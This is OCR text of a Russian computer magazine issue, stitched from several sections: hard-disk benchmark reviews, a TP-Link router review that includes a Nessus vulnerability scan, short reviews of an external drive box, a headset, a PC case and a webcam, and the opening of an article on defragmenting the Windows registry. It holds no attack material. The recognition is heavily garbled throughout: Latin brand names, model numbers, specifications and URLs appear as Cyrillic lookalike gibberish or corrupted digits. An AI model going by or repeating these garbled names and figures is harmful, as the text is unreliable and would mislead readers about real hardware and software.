отнести к лидерам, но для большинства пользовательских задач этих 
значений должно хватить с лихвой. С другой стороны, диск продемонстри- 
ровал минимальное среди остальных участников теста время случайного 
доступа и неплохой показатель в тесте, измеряющем пиковую скорость 
интерфейса. Тестируемый накопитель отлично выглядел в дисковыхтестах 
РСМагкОб. Его итоговый рейтингоказался на втором месте сразу после 
результата, показанного НІІасЬІ Н 05721 01 ОКбАЗЗО. К плюсам устройства 
также можно отнести результат в тесте Іотеіегс использованием паттерна 
МиШтесІіа зітеат. Зато при применении паттерна Рііе зегѵегтестируе- 
мый девайс высокой производительностью похвастаться не может (как и 
старшая модель, которую, впрочем, он немного опережает, кроме модели 
доступа Ьеаѵу). За времятестированияжесткий дискразогрелся до темпе- 
ратуры 48 градусов. 



Средняя скорость последовательного чтения/записи Мб/с (больше — лучше) 




Максимальная скорость последовательного чтения принадлежитжесткому 
диску ѴѴ07500АУУ5, далее следует ѴѴ05000ААК5, на третьем месте с неболь- 
шим отставанием от второго — ЕЮ5721 01 0К6А330 



Пятисотгигабайтный жесткий диск производства ѴѴезШгп Оідііаі. Внешний 
вид накопителятрадиционен для ѴѴезІегп Оідііаі. Плата контроллера при- 
креплена к гермоблоку планарными элементами вверх, что снижает риск 
повреждения винта при неаккуратном монтаже в корпус компа. Правда, 
есть и отличие от предыдущих изделий ѴѴй — жесткий диск лишился второ- 
го разъема питания типа тоіех. Емкость в 500 Гб реализована с помощью 
трех магнитных дисков с плотностью записи 1 66 Гб. Порадовали скорости 
чтения изаписи, продемонстрированныежестким диском; поэтим показа- 
телям он расположился на втором месте. Оченьуверенно девайс выглядел 
и втесте, измеряющем время случайного доступа. А вотскорость чтения 
из буфера оказалась на уровне, продемонстрированном накопителем 
НііасЬІ Н 05721 01 ОКбАЗЗО. Для диска 5АТА300 это значение могло быть и 
повыше. Очень неплохо накопитель выступил в дисковыхтестах РСМагк05, 
за исключениемтеста Ѵігиввсап. Производительность в Іотеіег можно 
смело заносить в положительный актив жесткого диска: победа втесте с 
использованием паттерна Еііе зегѵег и третье место втесте с применением 
паттерна МиШтесІіа зігеат. За время тестирования максимальнаятемпе- 
ратура не превысила 47 градусов. 



Зігеатіпд раііегп N00 ОЫ 




ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ ПРЕДСТА- 
ВИТЕЛЬСТВАМ КОМПАНИЙ ѴѴО, 5 Е АО АТЕ И НІТАСНІ 
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ѴѴезіегп Оідііаі Ш7500АѴѴ5 



ѴѴезіегп Оідііаі Ж010ЕАС5 



Технические характеристики: 

Объем, Гб: 750 
Интерфейс: 5АТА 300 
Скорость вращения, об/мин: 7200 
Объем кэш-памяти, Мб: 1^ 
Количество ДИСКОВ: н/д 
Количество ГОЛОВОК: 

Поддержка N00: ест 
Размеры, мм: н/д 
Масса, кг: н/д 



Технические характеристики: 

Объем, Гб: 1000 
Интерфейс: 5АТА300 
Скорость вращения, об/мин: 7200 
Объем кэш-памяти, Мб: 1/ 
Количество дисков: н/д 
Количество ГОЛОВОК: 

Поддержка N00: есть 
Размеры, мм: н/д 
Масса, кг: н/д 



О О 



О 



Жесткий диск производства ѴѴевіегп Оідііаі емкостью 750 Гб, причем имен- 
но в 750- Гб накопителях ѴѴевіегп Оідііаі начала использовать магнитные 
пластины на основе перпендикулярной записи. Винчестер принадлежит 
ксемейству профессиональных накопителей РЕ2 (гаіб ебіііоп), предна- 
значенных для использования в серверах начального уровня и в составе 
гаісі-массивов и отличающихся отбевкіор-устройств повышенным вре- 
менем наработки на отказ. По показателям тестов, измеряющих скорость 
последовательного и случайного чтения/записи, накопитель продемонс- 
трировал лучшие результаты среди протестированныхустройств. Отметим 
также и неплохое время случайного доступа плюс достаточно высокую 
скорость чтения из буфера. Жесткий дискуверенно выглядел вдисковых 
тестах РСМагкОб (особенно втесте Рііе ѵѵгііе), правда немного недотянул до 
уровня обоих дисков НІІасИІ. Для жестких дисков ѴѴевіегп Оідііаі характер- 
на высокая производительность в Іотеіег. Рассматриваемый экземпляр 
это подтвердил, показав второй результат (вслед за ѴѴ05000ААК5) в тесте с 
применением паттерна Рііе вегѵег и уверенно победив втесте, использую- 
щем паттерн Миііітесііа вігеат. Максимальнаятемпература, зафиксиро- 
ванная на устройстве во времятестирования, равнялась47 градусам. 



(меньше — лучше) 




^ ВЫВОДЫ 

Награда «Выбор редакции» присуждается жесткому диску НІІасИІ 
Н 05721 01 0КЕА330 за огромную емкость и высокие скоростные 



Воти компания ѴѴевіегп Оідііаі пополнила список производителей нако- 
пителей информации, которым по силам выпускжестких дисков емкостью 
1 Тб. Внешний вид винта неутратил характерных черт ѴѴевіегп Оідііаі: 
черный корпус гермоблока с серебристой крышкой; плата контроллера 
прикручена к гермоблоку планарными элементами вверх. Производитель- 
ность накопителя в операциях чтения и записи невысока и соответствует 
результатам, показанным НІІасЬІ НОТ725050ѴІА360. Крометого, этому 
жесткомудиску принадлежит самое высокое время случайного доступа 
среди протестированныхустройств. С другой стороны, жесткий диск 
показал очень высокую скорость чтения из буфера, уступив только Зеадаіе 
5Т375064С^5. К плюсам можно отнести и достаточно хорошую производи- 
тельность в дисковыхтестах РСтагкОб. Как и два предыдущих накопителя 
производства ѴѴевіегп Оідііаі, девайс хорошо проявил себя при тестирова- 
нии в Іотеіег, занявтретье место при использовании паттерна Рііе вегѵег и 
показав второй результат сразу после ѴѴ07500АУУ5 втесте, использующем 
паттерн Миііітесііа вігеат. Максимальная температура, зафиксированная 
на накопителе, составила 47 градусов, но на наш взгляд, показания 5МАРТ 
были несколько занижены и жесткий диск разогрелся сильнее. 



РСМагкОБ — Тест ХР 5*агШр, Мб/с ЫСО ОЫ 




Тест РСМагкОб — ХРЗіагІир измеряетэффективность работы винчестера 
при симуляции загрузки ѴѴІпбоѵѵвХР, лидируют изделия производства 
НІІасЬІ 



характеристики. Награда «Лучшая покупка» вручается накопителю 
информации ѴѴевіегп Оідііаі ѴѴ07500АУУ5 за оптимальное сочетание 
объема и отличной производительности, т 
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ОБЗОР РОУТЕРА 





ТР-І_ШКТІ_-ѴѴК6426 



Технические характеристики 

Интерфейсы: ІхѴѴАЫ (РЛ45) 10/100 Мбит/сек, 
4х ЬАЫ (РЛ45) 10/100 Мбит/сек 
Беспроводная точка доступа ѴѴі-Рі: ІЕЕЕ 802.1 1 
Ь/д + 5ирег6 (до 108 Мбит/сек) 

Безопасность: ѴѴЕР (до 1 28 бит), ѴѴРА/ѴѴРА- 
Р5К, ѴѴРА2/ѴѴРА2-Р5К (ТКІР/АЕ5), поддержка 
РА0Ш5 

Функции роутера: ЫАТ/ЫАРТ, РупРЫЗ, РНСР, 
5*а*іс РоіЛіпд 

Функции файрвола: 5РІ, РоЗ Ргоіесііоп, 

ІР АсІсІгезз/Ротаіп/МАС РіКегіпд 

Дополнительно: Ы/А 



Беспроводные домашние интернет шлюзы сейчас, пожалуй, самый популярный продукт 
среди всех ЗОНО-вендоров. У каждого из них в линейке имеется огромное число вариантов, в 
основном отличающихся только ѴѴі-Рі частью. Не так давно на охоту за сердцами отечествен- 
ных пользователей вышла компания ТР-Ілпк. Портфолио этого вендора довольно стандартно 



и содержит как домашние устройства, так и оборудование начального уровня для ЗМВ-сег- 
мента. В сегодняшнем обзоре мы поговорим об интернет-шлюзе ТР-ЬіпкТЬ-\ѴК642С. 



В ВНЕШНИЙ ВИД И КОМПЛЕКТАЦИЯ 

Шлюз упакован в белый корпус с черной окантовкой. На лицевой стороне 
находятся светодиоды питания, индикации состояния устройства, 
активности беспроводного сегмента, ѴѴАКІ-интерфейса и портов І_АІ\І. На 
тыльной стороне расположены разъем питания, порты ЬАЫ и ѴѴАЫ, кнопка 
сброса на заводские настройки и разъем для подключения антенны. Пос- 
ледняя имеет коэффициент усилен ия 5 бВІ. 

Н АППАРАТНАЯ НАЧИНКА 

Роутер построен на базе платформы АіЬегоз АР2318 — «Системы на крис- 
талле», выполняющей функции СРЫ-роутера и ѴѴІ-РІ точки доступа. Бес- 
проводной модуль поддерживается фирменныетехнологии АШегоз Зирег 
Ѳ и АіЬегоз ЕхіепсІесІ Папде, что позволяет при использовании адаптеров 



того же производителя получить канальную скорость 108 Мбит/сек и уве- 
личенный радиус действия. Используется микросхема оперативной памя- 
ти ЕігопіесЬ ЕМ6381 65Т5-7 объемом 8 Мб, работающая на частоте 143 МГц. 
Также на плате распаян чип Магѵе1188Е6060-РСЛ — пятипортовый Раз* 
ЕіЬегпеІ коммутатор. В качестве ІЗазЬ-памяти используется микросхема 
25Р16Ѵ5І6. Кслову, это третья аппаратная версия модели ТЕ-ѴѴР6426. 

В ФУНКЦИОНАЛЬНЫЕ возможности 

На ѴѴАЫ- интерфейсе доступно задание настроек в режимах Зіаііс/Оупатіс 
ІР, РРРоЕ, 802.1Х + 5*а*іс/Вупатіс ІР, ВідРопсі СаЫе, РРТРи Ь2ТР. 
Возможность использования протокола ІЕЕЕ 802. IX на ѴѴАЫ-интерфей- 
се довольно нестандартна, однако на практике она применяется очень 
редко. Что касается весьма распространенныху нас РРТР и Ь2ТР, то тут 
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все очень многообещающе. В обоих случаях роутер имеет возможность 
получать настройки какавтоматически с ОНСР-сервера, так и статично. И 
там, итам адрес ѴРІ\І-сервера задается в виде ІІРІ_, что полезно в случае, 
если у провайдера закреплено несколько серверов за одним логическим 
именем. Таким образом, роутер изначально имеет возможность установки 
интернет-соединения по протоколам РРТР/И2ТР, причем сервер может 
находиться вне пользовательского сегмента. 

Как и в большинстве роутеров, здесь имеется функция статической мар- 
шрутизации. Напомним, что в случае установки РРТР/І_2ТР-соединения 
на ѴѴАКІ-интерфейсе образуется два виртуальных подключения: первое 
— базовое с локальной сетью провайдера, второе — ѴРЫ до интернета. 

Для того чтобы сохранить доступ к локальным ресурсам провайдера, 
требуется задать статические маршруты, указывающие на то, что путь к 
ним лежит через базовое соединение. Часто вустройствахтакого класса 
подобная функция не работает именно при использовании РРТР/І_2ТР- 
протоколов. Роутер «забывает» о существовании шлюза в базовой сети 
и маршрутизирует все в интернет. Ксожалению, у рассматриваемого 
роутера именнотакая проблема. 

Также обидно и то, что роутер не имеет возможности работы с протоко- 
лом І6МР, что необходимо для корректной работы мульти кастового ІРТѴ. 

В целом же набор функций для домашнего интернет-шлюза довольно 
стандартен. Здесь есть возможность клонирования МАС-адреса на ѴѴАКІ- 
интерфейсе, ОНСР-сервер, настройка трансляции портов КІАРТ (Ѵігіиаі 
Зегѵег, РогіТгіддегіпд), выделение ОМЕ-зоны и ІІРпР. 

ѴѴеЬ-интерфейс построен довольно логично и понятно. Изменение многих 
настроек осуществляется без необходимости в перезагрузке, что эко- 
номит немало времени. Если перезагрузка все-таки понадобилась, она 
занимаетоколо 25 секунд, что, в общем-то, сравнительно немного. 

г МЕТОДИКАТЕСТИРОВАНИЯ 

Длятестирования проводного и беспроводного сегментов использовался 
программный продукт КІеШ СЬагіоі и скриптТЬгоидЬриі с передачей 



пакетов максимального и минимального размера. На двух станцияхуста- 
на вливались та к называемые епброіпі-программы, затем в консоли ЫеШ 
СЬагіоі: запускался скрипт генерации трафика. Все измерения проводи- 
лись с прошивкой версии 3.6.1 . 

1. При тестировании пропускной способности ѴѴАЫ -> І_АК1 одна из стан- 
ций подключалась кодному из портов свитча (интерфейс ЕАЫ), вторая — к 
ѴѴАЫ-порту. Таким образом, мы получали пиковую пропускную способ- 
ность для ѴѴАЫ-интерфейса (также ее можно называть скоростью ЫАТ). 
Измерялась скорость однонаправленной передачи (направления ѴѴАЫ 

-> І_АІ\І и І_АІ\І -> ѴѴАКІ) и в режиме полного дуплекса (РОХ). Для оценки 
влияния функции фильтрации нежелательного трафика (файрвол, 0о5- 
ргоіесііоп) на производительность роутинга, замеры проводились при их 
активации и без них. 

2. Поскольку при активации интернет-соединения по протоколу РРТР 
создается дополнительная нагрузка на центральный процессор роутера, 
мы также измерили пропускную способность РРТР. Для этого за ѴѴАЫ- 
интерфейсом маршрутизатора был поднятѴРКІ-сервер. Крометого, про- 
верялась возможность установки ѴРЫ-соединения в случае размещения 
ѴРЫ-сервера вне сегмента нахождения нашего маршрутизатора. 



Пропускная способность ѴѴАМ->І.АМ 




О 10 20 30 40 50 60 70 




На графике представлена пропускная способность в двух режимах: с ис- 
пользованием протокола РРТР и в режиме Зіаііс I Р ( N АТ Опіу) 
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3. Для оценки скорости ѴѴі-Рі мы использовали РСМСІА-адаптерТР-Ыпк 
И-ѴѴЫ61 ОѲ и ІІ5В-адаптерТР-І_іпкТІ_-ѴѴМ6206. Измерения проводились в 
типичной квартире из двухточекс разнымудалением от роутера. В первом 
случаеудаление не превышало 1 м и, какследует, измерялась максималь- 
ная скорость передачи данных. Во втором случае ноутбуке ѴѴІ-РІ адаптером 
находился на расстоянии 10 м отточки доступа по диагонали за стеной. Во 
всех случаях использовалось шифрованиетрафика ѴѴРА-Р5Кс ключом ТКІР 

4 . В качестве дополнительного исследования была проведена проверка 
науязвимости со стороны ѴѴАЫ-интерфейса с помощью программного 
продукта ТепаЫе Ыеззив. Сканирование проводилось в двух режимах: с 
включенным и выключенным файрволом. 

г РЕЗУЛЬТАТЫ ТЕСТОВ 

Сразу отметим, что в процессе тестирования выяснилось, что со стабиль- 
ностью у роутера проблемы. Апдейт прошивки до последней, имеющейся 
на сайте, не повлиял на результаты. 

Итак, скорость ЫАТ находится на неплохом для этого класса устройств 
уровне. В направлении ѴѴАЫ -> І_АЫ она составляет 56,24 Мбит/сек, в 
обратном — 46,77 Мбит/сек, при передаче в обе стороны — 67,23 Мбит/сек. 
Включение средств защиты практически никак не сказывается на произ- 
водительности. Причем в направлении ИАИ ѴѴАЫ пропускная способ- 
ность становится даже больше — скорее всего, это баг микропрограммы 
прошивки. 

Приятно порадовала производительность при использовании протокола 
РРТР. В направлении ѴѴАЫ -> І_АЫ пропускная способность составляет 
50,18 Мбит/сек, в обратном — 37,65 Мбит/сек, при передаче в обе стороны 
— 57,25 Мбит/сек. С включенным файрволом результат практически не 
изменяется. 

А вот с ѴѴІ-РІ дело обстоит куда хуже. При использовании режима ЗирегѲ 



Скорость ѴѴі-Рі (пакет максимального размера) 




Скорость ѴѴІ-РІ при передаче пакетов максимального размера 




связь очень нестабильна. Втестах с одновременной передачей пакетов 
максимального размера в обоих направлениях физический коннект часто 
прерывался дозавершения передачи. Усредненные результаты отлича- 
ются на порядки; добиться стабильности ни сменой прошивки, ни сменой 
драйверов адаптеров неудалось. Только форсирование в настройках 
роутера канальной скорости 54 Мбит/сек (и, какследствие, использование 
802.1 1 д без «надстроек»] позволяет получить более-менее стабильные ре- 
зультаты. Разумеется, в этом случае скоростного выйгрыша по сравнению 
стипичными 54д-устройствами не наблюдается. 

Детально комментировать результаты, особого смысла нет — все итак вид- 
но из графиков. И то, что скорость при одновременной передаче меньше, 
чем в случае однонаправленной, не ошибка верстки. В целом в режиме 
Зирег 6 скорость, конечно, заметно выше, однако низкая стабильность 
коннекта практически сводит пользу отэтого режима на нет. 
СканированиеТепаЫе Ыезвив не выявило серьезныхуязвимостей вуст- 
ройстве, что говорито его сравнительно хорошей защищенности. 

г ВЫВОДЫ 

Надо сказать, что, на наш взгляд, роутер ТР-Ііпк И-ѴѴР642Ѳ весьма пер- 
спективен. Отрадно, что в нем учтены некоторыетребования, предъяв- 
ляемые российскими провайдерами (в частности, это касается РРТР/ 
12ТР-клиентов). Устройство обеспечиваетхорошую скорость ЫАТ-марш- 
рутизации и весьма высокую производительность РРТР/12ТР-туннелей. 
Существенными его недостатками являются нестабильная работа ѴѴі-Рі 
в режиме Зирег 0, некорректная работа функции статической маршру- 
тизации и невозможность работы в качестве І6МР Ргоху. Надеемся, что 
все эти недостатки удастся устранить программным путем, что, вероятнее 
всего, сделает этот роутер одним из лучших продуктов в своей ценовой 
категории, □с 



Скорость ѴѴі-Рі (пакет минимального размера) 




Скорость ѴѴІ-РІ при передаче пакетов минимального размера 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКОМУ ПРЕДСТАВИ- 
ТЕЛЬСТВУ КОМПАНИИ ТР-ЫЫК 
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Собери свою мечту... 






^ ■Геггит 



4 девайса 



КаійзопісІСУВОХ 

ІВ-2508Ти 

Недорогой, но надежный внешний бокс 





Технические характеристики: $40 

Формат, ДЮЙМЫ: 2,5 

Интерфейс: 115В 2.0 

Поддержка винчестеров: 5АТА 

Скорость передачи данных, Мбит/с: до 480 

Размеры, мм: 260x185x30 

Вес, г: 70 

т 

1. Легкий алюминиевый корпус отлично держит жесткий диск, выглядит 
достаточно стильно, вто же самое время является довольно стойким к 
падению. Насчетлегкости образования царапин пока ничего сказать 
нельзя. 

2. Бокс нетребуетадаптера питания: два шнура подключаются к ІІБВ-пор- 
там (один — на питание, другой — на передачу данных). 

3. Внутри достаточно много места, но послеустановки жесткий диск не 
болтается, хотя использовать бокс, не закрепив самым тщательным обра- 
зом крышку и винчестер, крайне не рекомендуется. Инсталляция носителя 
проходит вообще без проблем, винчестер легко садится на гнездо разъема 
5АТА. Конструкция выглядит весьма практичной и долговечной. 

4. В комплекте идет приятный кожаный чехол и тряпочка для протирки. Что 
именно необходимо протирать, не совсем понятно. Полагаем, саму поверх- 
ность бокса, чтобы выглядел как новенький. 

0 

1. Высокая цена по сравнению саналогичными попагше-изделиями. 

2. Пленка, прикрывающая электронные элементы бокса, ненадежная и 
примерно через десяток за мен винчестера имеет все шансы оторваться. 



Технические характеристики: 

Интерфейс: 115В 

Регулятор громкости: есть $150 

Кнопка тиіе: есть 
Полоса пропускания, Гц: 150-6800 
Входное сопротивление, Ом: 200 



1 . Дуга и ее основа выполнены из жесткого пластика, момент регулировки 
длины ушка жестко фиксируется. На металлической основеустанав- 
ливаетсяугол наклона микрофона. Самиуши имеют небольшой люфт, 
чтобы пользователю не приходилось их постоянно поправлять. Сидятони 
изумительно, только их высоту лучше отрегулировать с самого начала. Как 
уже упоминалось, фиксаторы достаточно жесткие, и одной рукой во время 
работы их подрегулировать очень сложно. Приходится снимать и настраи- 
вать отдельно. 

2. Качество звука — отличное. Но стоит понимать, что это очень нишевая 
модель. Она прекрасно подходит для разговоров; возможно, это лучшее ре- 
шениедля компьютерной ІР-телефонии, но вот для игр или прослушивания 
музыки лучше подыскать что-то другое. Играм банально нехватаетобъема, 
музыке — чистоты звучания во всем спектре частот. Но для своих целей и 
задач это один из лучших вариантов, хоть и недешевых. 

3 . Уши выполнены из сравнительно жесткого поролона. Вдобавок в ком- 
плекте идут прорезиненные накладки — кому какболыше нравится. 



0 



1 . Чуть ниже на проводе расположен довольно громоздкий регулятор гром- 
кости. Также имеется кнопка выключения звука. С одной стороны, опция, 
конечно, полезная, с другой — непонятно, почему нельзя было сделать 
регулятор менее громоздким. Наушники реально ощутимо сидят на голове, 
а провод вкупе с регулятором громкости тянет их вниз. 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИЯМ «НЕВАДА» 
(Т.І495) 981-4839. У/УУУУ.ЫЕУАРА.Яи К КАІР50ШС [ ѴУѴУѴУ.КАІР50МІС.РЕ ). АТАКЖЕ РОССИЙСКИМ ПРЕДСТАВИТЕЛЬСТВАМ КОМПА- 
НИЙ ОЫ И І.АВТЕС 
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Технические характеристики: 

Цвет: белый/черный 
Форм-фактор: АТХ Р Місго АТХ Р Риіі АТХ 
Разъемы : 2х 115В 2. 0 Р Аисііо + МІС рогі 

Отсеки 5,25 дюйма: 1 внешний 
Отсеки 3,5 дюйма: 2 внутренних 
Слоты расширения: 7 
Система охлаждения: СА 61.1 
Вентиляторы: тыловой, 80 мм 
Размеры, мм: 170x328x420 
Вес, нетто, кг: 3,5 




1. Корпус оправдываетсвое названиеТОАЗТ благодаря новой запатен- 
тованной технологии установки оптического привода — лицевой панелью 
вверх. Он действительно напоминаеттостер, особенно если открыть 
установленный Сй или ОѴй-РОМ. Способ установки необычный, но 
позволяющий сэкономить много места внутри корпуса, поэтомуу ОМС Р2 
Т0А5Т довольно необычная форма: продолговатость не по горизонтали, а 
по вертикали. 

2. На верхней панели расположена крышка с надписью «йідііаі рогіз», под 
которой размещены два разъема 115В 2.0, два аудиовхода (для наушников и 
микрофона), эта кже, как ни странно, кнопка Резеі. 

3. В передней панели есть полость, в которую выезжает лоток с диском из 
оптического привода. Полость подсвечивается сверху синими светодио- 
дами, в то время как кнопка включения горит красным светом. Вся эта 
иллюминация выглядит очень эффектно. 

4. Предусмотрена серьезная вентиляция корпуса — система охлаждения 
ОАО 1.1. Налевой боковой панели имеются два вентиляционных отверстия 
для процессора и плат расширения. Еще два находятся внизу, по бокам 
передней панели. На задней стенке установлен дополнительный кулер и 
есть место для еще одного. 

5. Интересен способ установки внутри корпуса 3,5-дюймовых накопителей 
— держатели располагаются не вдоль, а поперек корпуса, то есть разъема- 
ми кбоковой стенке, что та кже экономит место внутри корпуса. Винчестеры 
крепятся не винтами, а защелками. 

0 

1. Хотелось бы иметь возможность подключения 3,5"-устройств вроде 
ІЗорру-дисковода, чтобы установить в нем, например, кардридер. 



Корпус СМС К.2 
ТОА8Т 

Тостер для железа 
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ЬаЪіес ѴѴеЬсаіп 
Рго 

ѴѴеЬсат с индикатором работы 



; ' ' Ц $30 

Технические характеристики: 

Разрешение матрицы, мегапиксели: 0 Р 3 
Максимальное разрешение, пиксели: 640 x 480 
Максимальная частота кадров, кадр/сек: 30 
Ручная фокусировка: есть 
Встроенный микрофон: есть (і) 

Интерфейс связи с ПК: ІІ5В1.1 
Поворот по горизонтали, градусов: 360 
Поворот по вертикали, градусов: 15 
Габаритные размеры, мм: 85 x 70 x 65 
Вес видеокамеры: 77 г 




1. Плюсом, несомненно, является малый вес камеры: ее можно поставить в 
любое место или даже повесить, если очень хочется. По этим же причинам 
камерулегко возитьссобой, причем в последнем случае важную рольсыг- 
раюттакже ее небольшие размеры и относительно плоский профиль. 

2. Фирменный софт позволяет вести фото- и видеосъемку, причем ролики 
можно делать с разрешением 640x480, а изображения — 1280x960. 

3. Есть встроенный микрофон (хотя для качественной связи лучше 
использовать отдельный микрофон, а не интегрированный, а еще лучше 
подключить аудиогарнитуру. 

4. В наличии индикатор состояния камеры (включена/выключена). Очень 
полезная вещьдлятех, кто боится, что интернетза ним подсматривает :). 

0 

1. Малый диапазон изменения угла наклона камеры — всего 15 градусов, 
да и тот достигается путем сильного отклонения основной части корпуса 
камеры от подставки, что при большихусилиях может привести к поломке 
последней. 

2. Иногда по неясным причинам видеопоток вдруг начинаеттормозить, а 
через некоторое время (около 5 секунд) снова восстанавливается, причем 
отхарактеристиктестового компьютера это никак не зависит (при переходе 
на более мощную конфигурацию ничего не изменится). 
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КАК ПОЗАБОТИТЬСЯ 
О РЕЕСТРЕ 



СКОРЯЕМ РАБОТУ СИСТЕМЫ ЗА СЧЕТ ДЕФРАГМЕНТАЦИИ РЕЕСТРА 



Свежекупленный компьютер работает быстро, но со временем производительность 
уменьшается, достигая стадии полной деградации уже через несколько лет. Продвину- 
тые пользователи знают, что виной тому фрагментация файловой системы, но только 
гуру догадываются, что реестр также подвержен фрагментации, причем как внешней, 
так и внутренней, и вклад, вносимый ей в общее падение быстродействия, весьма значи- 
телен. Как вернуть системе молодость без переустановки и прочих радикальных опера- 
ций? Об этом и поговорим. 



еестр используется постоянно, даже когда мы об этом 
совсем не подозреваем. Стоиттолько открыть диалоговое 
окноЗаѵеАз, как система тутже полезет в реестр за стилем, 
размером/положением окна, перечнем зарегистриро- 
ванных расширений вместе с сопоставленными им иконками ит.д. и 
т.п. Словом, даже если дисковая активность отсутствует, жизнь реестра 
бурлит, словно полноводная река. Проследитьза ней можно с помощью 
знаменитой утилиты РедМоп от Марка Руссиновича, распространяемой 




Проведем простой эксперимент: запустим РедМоп, вызовем «Блокнот», 
откроем окно «Сохранить как» и подсчитаем количество обращений к 
реестру, совершенных за это время. Только сначала пристегнем ремни, 
чтобы не упасть со стула, потому что обращений этих без малого 3496! Что 
же тогда говорить о «полновесных» приложениях?! Для достижения мак- 
симальной производительности необходимо добиться, чтобы все ветви 
реестра располагались как можно ближе друг кдругу и магнитная головка 
не совершала лишнихтелодвижений. Ктомуже реестр грузится в РАМ- 
кэш, и с ростом фрагментации нетолько падает производительность, но и 
увеличивается объем потребляемой памяти! 
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Дефрагментация системного реестра утилитой Редізігу Ое^гадтепіаііоп 

В процессе добавления/удаления новых ключей данные какбы размазыва- 
ются по реестру, образуя многочисленные дыры, увеличивающие объем как 
дискового файла, таки оперативного буфера, выделенного для его кэширо- 
вания. Причем переустановка операционной системы поверх проблему не 
решает, поскольку использует старый реестр в качестве скелета, на который 
цепляется очередная порция ветвей, а прежние дыры оставляет в неприкос- 
новенности. Реестр продолжает пухнуть, словно на дрожжах, пока, наконец, 
пользователь не отформатируетдиск и не переустановит ѴѴІпбоѵѵз с нуля, но 
это не слишком гуманная операция, ктомуже отнимающая массу времени. 
Мыщъх, переустанавливавший своюлюбимую ѴѴ2Квсеголишьдва раза за 
последние восемь лет, с фрагментацией реестра знаком не понаслышке и за 
это время разработал тактику и стратегию борьбы, позволяющую обходиться 
без каких бы то ни было переустановок вообще! Самое интересное, что даже на 
свежеустановленной системе, поставленной на только что отформатирован- 
ный диск, реестр уже фрагментирован (спасибо разработчикам инсталлятора!). 

Н УСТРОЙСТВО РЕЕСТРА 

Реестр является внутренней кухней операционной системы, и эта кухня 
разительным образом отличается в 9х и N1. Поскольку 9х уже давно труп, 
мы сосредоточимся исключительно на ЫТ-подобных системах, кчислу ко- 
торых принадлежит, во-первых, сама ІЧТ, а также ѴѴ2К, ХР, Зегѵег 2003/2008 
и Виста (хотя в Висте наблюдаются некоторые изменения, для понимания 
материала они некритичны, так что не будем заострять на них внимание). 
Физически реестр представляет собой набор дисковых файлов, перечис- 
ленных втаблице, и блокируемых операционной системой еще на ранней 
стадии загрузки, а потому и неподвластных штатному дефрагментатору. 
Внутри реестр представляетсобой двоичное дерево, а всякий, кто писал 
свою собственную реализацию таких структур данных, знает, чтодерево со- 
стоит из листьев и узлов (ветвей), причем листья одного узла могут распо- 
лагаться в различных концах файла реестра. Такое часто случается. Файл 
реестра заполняется последовательно по мере добавления новых ветвей. 
Ноесли мы добавляем листкранее созданной ветви, он добавляется в конец 
файла, вто время как родительская ветвь расположена где-то в середине. 
При удалении ветвей реестра соответствующие им листья лишь помечаются 
какудаленные, образуя дыру. Физической реорганизации данных при этом 
не происходит! Реестр стремительноувеличивается в размерах, а операци- 
онная система не имеетникаких механизмов для расчистки мусора! 
Поскольку данные из реестра не только читаются, но и добавляются, при- 
чем порядок добавления новых ветвей в общем случае произволен, листья 
одного узла, вместо того чтобы быть сгруппированными вместе, оказыва- 
ются разбросанными по значительной площади. Для увеличения произ- 
водительности МісгобоЙ стремится минимизировать обращения кфайлам 
реестра, кэшируя их в памяти. Проблема в том, что кэширование осущест- 
вляется на страничном уровне, а размер одной страницы составляет4 Кб. 
То есть если нам нужно прочесть 1 0 ветвей реестра (размером -100 байт 
каждая), разбросанных по всему файлу, то мы теряем уже не 1 0x1 00==1 000 
байт, а 1 0х4096==40960 байт, тоестьсвыше40 Кб оперативной памяти!А 




Сканирование системного реестра на предметошибокутилитой АбѵапсесІ 
Редізігу Орйгтшег 



ведь системе требуется работать отнюдь не с десятью ветвями, и килобай- 
ты превращаются в десятки мегабайт! Отсюда своп, тормоза, еіс. 

Таким образом, системный реестр подвержен как внешней, так и внутрен- 
ней фрагментации. Внешняя фрагментация — это порядок расположения 
кластеров на диске. В идеале все файлы реестра (перечисленные втабли- 
це)должны быть записаны водной или нескольких непрерывных областях. 
Если же они разбросаны по поверхности диска, как птичий помет, о какой 
производительности можно говорить?! 

Внутренняя фрагментация — это порядокследования узлов и листьев. В 
идеале, листья, принадлежащие одному узлу, должны быть записаны в не- 
прерывной области файла реестра как можно теснее друг к другу (то есть без 
дыр, оставшихся послеудаления старых ветвей). Следовательно, дефраг- 
ментацию необходимо осуществлять в два этапа, чем мы сейчас и займемся. 

Н БОРЬБАС ВНЕШНЕЙ ФРАГМЕНТАЦИЕЙ 

Существует множество дефрагментаторов, умеющих обрабатывать 
заблокированные файлы (штатный дефрагментатор, какуже говорилось, 
не входитв ихчисло). Лично мыщъх предпочитает простой, надежный, быс- 
трый и бесплатный Зузіет Рііе Оеітадппеп1:егот Марка Руссиновича, ( ѵѵѵѵѵѵ. 
тісговоІІсотЛесЬпеі/зѵзіпІегпаІз/ВІІеАпбРівк/РадеРеІтад.ппБрх ) , та кже 
называемый Раде Реітад. Он работаетчерез родное АРІ дефрагментации 
ЫТР5-драйвера, что обеспечиваетему совместимость со всеми версиями 
ѴѴІпсіоѵѵб (включая еще невышедшие), чего нельзя сказатьо дефрагмен- 
таторах других производителей, разбирающих базовые ЫТРЗ-структуры 
«вручную» и потому довольно часто превращающие диск в труху, из которой 
его потом придется долго и мучительно восстанавливать. 

Короче, запускаем радесіітд.ехе (внимание!требуются права администратора!) 



Что почитать 
по теме? 

Если хочешь лучше разобраться в устройстве системного реестра, 
рекомендую почитать эти статьи: 

Іпзісіе ѴѴілсіоѵѵз ЫТ Бі$к Веіта§теп1:іп§ — статья Марка Руссиновича, 
рассказывающая о работе дефрагментатора, встроенного в штатный 
драйвер ШТЗ.ЗУЗ (на английском языке) : тѵш.тісгозоЛ.сот/ 
